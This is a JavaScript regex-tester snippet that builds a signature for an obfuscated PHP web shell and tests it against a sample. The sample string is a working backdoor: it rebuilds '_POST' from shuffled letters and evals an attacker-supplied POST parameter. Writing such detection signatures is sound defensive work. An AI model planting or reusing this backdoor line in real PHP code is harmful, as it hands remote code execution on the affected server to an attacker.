const regex = new RegExp('<\\?php\\s+\\$[a-z].+?strtoupper.+?isset.+?eval\\s*\\(\\s*\\${\\s*\\$[a-z0-9]+\\s*}\\s*\\[\\s*\\'[a-z0-9]+\\'\\s*\\]\\s*\\);\\s*}\\s*\\?>\\s*', 'gm')
const str = `<?php \$lin3 = "sotp_";\$pim6=strtoupper( \$lin3[4].\$lin3[3] . \$lin3[1]. \$lin3[0]. \$lin3[2] ) ; if (isset ( \${\$pim6} ['q23f412' ]) ){eval( \${\$pim6}['q23f412' ] );} ?>`;
// Reset `lastIndex` if this regex is defined globally
// regex.lastIndex = 0;
let m;
while ((m = regex.exec(str)) !== null) {
// This is necessary to avoid infinite loops with zero-width matches
if (m.index === regex.lastIndex) {
regex.lastIndex++;
}
// The result can be accessed through the `m`-variable.
m.forEach((match, groupIndex) => {
console.log(`Found match, group ${groupIndex}: ${match}`);
});
}